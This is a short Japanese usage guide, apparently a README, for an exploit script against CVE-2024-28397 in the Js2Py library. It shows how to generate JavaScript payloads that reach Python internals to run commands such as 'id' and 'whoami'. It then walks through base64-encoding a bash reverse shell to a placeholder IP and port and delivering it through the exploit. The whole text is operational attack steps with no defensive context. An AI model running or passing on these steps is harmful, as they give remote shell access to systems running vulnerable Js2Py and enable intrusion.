
このスクリプトは、Python内部がオブジェクトラッパーを通じて露出している脆弱な環境で、Js2Pyによって評価可能なJavaScriptペイロードを生成します。
基本的なコマンド実行:
python3 cve-2024-28397.py -c "id"
コンパクトな1行ペイロードを生成:
python3 cve-2024-28397.py -c "whoami" --compact
Base64ペイロードを生成:
echo 'bash -i >& /dev/tcp/IP/PORT 0>&1' | base64 -w0
Js2Pyペイロードを生成:
python3 cve-2024-28397.py -c "bash -c 'echo BASE64_OUTPUT | base64 -d | bash'" --compact
BASE64_OUTPUT を最初の手順で生成したBase64文字列に置き換えてください。